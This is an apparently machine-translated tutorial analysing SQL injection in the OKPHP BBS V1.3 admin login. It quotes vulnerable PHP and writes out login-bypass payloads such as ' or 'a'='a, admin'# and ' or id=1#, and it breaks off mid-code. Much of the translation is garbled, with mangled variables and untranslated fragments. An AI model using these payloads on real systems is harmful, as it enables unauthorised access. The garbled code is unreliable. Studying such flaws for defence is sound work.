I. Foreword: Version Information: OKPHP BBS V1.3 Open Source Download Address: http://www.cncode.com/softview.asp? Softid = 1800 Due to PHP and MySQL itself, PHP MySQL injection is more than ASP Difficult, especially in the construction of statements, this paper is a simple analysis of some documents to Okphp BBS V1.3, and talk about PHP MySQL injection phrase, I hope this article is a bit helpful to you. Disclaimer: All "Vulnerabilities" mentioned in the article have not been tested, and it may not exist at all. In fact, there is no vulnerability, it is not important, and it is important to analyze the ideas and statement constructs. II. "Vulnerability" analysis: 1.admin / login.php injection caused by bypassing authentication vulnerability: Code: $ conn = SQL_Connect ($ dbhost, $ dbuser, $ dbpswd, $ dbname); $ password = md5 ($ Password) $ = "SELECT ID, Group_ID from $ user_table where username = '$ usrname' and password = '$ password'; $ = sql_query ($, $ conn); $ row = SQL_FETCH_ROW ($ RES); $ Q = "Select ID, group_id from $ user_table where username = '$ usrname' and password = '$ password'" Username and $ Password are not filtered, it is easy to bypass. For Select * from $ user_table where username = '$ username' and password = '$ password' This method transformed method is: Construction 1 (using logical operation): $ usrname = 'or' a '=' a $ password = 'Or' a '=' a is equivalent to SQL statement: SELECT * from $ user_table where username = '' or '=' a 'and password =' or 'a' = 'a' Construction 2 (using MySQL Note statement #, / * Note $ Password Note): $ usrname = admin '# (or admin' / *) is: select * from $ user_table where usrname = 'admin' # 'and password =' $ password ' Equivalent to: select * from $ user_table where usrname = 'admin' In Admin / Login.php $ PASSWORD in the q statement is MD5 encryption before the query so that the statement in the construct 1 cannot be bypass.
Here we use constructive 2: select ID, group_id from $ user_table where username = 'admin' # 'and password =' $ password '"is equivalent to: select ID, group_id from $ user_table where username =' admin 'As long as there is user name Admin, if you don't know the username, you only know the corresponding ID, we can construct: $ usrname = 'or id = 1 # Parlect: SELECT ID, Group_ID from $ user_table where username =' or id = 1 # and password = '$ Password' (# 被 掉 掉) We will then look down from the code: if ($ row [0]) {// if not admin or super moderator if ($ usrname! = "Admin" &&! EREGI ("(^ &) 3 ($ &)", $ ROW [1])) {$ login = 0;} else {$ login = 1;}} // fail to login ------ --------- if (! $ login) {Write_log ("Moderator Login", "0", "Password Wrong"); Echo "
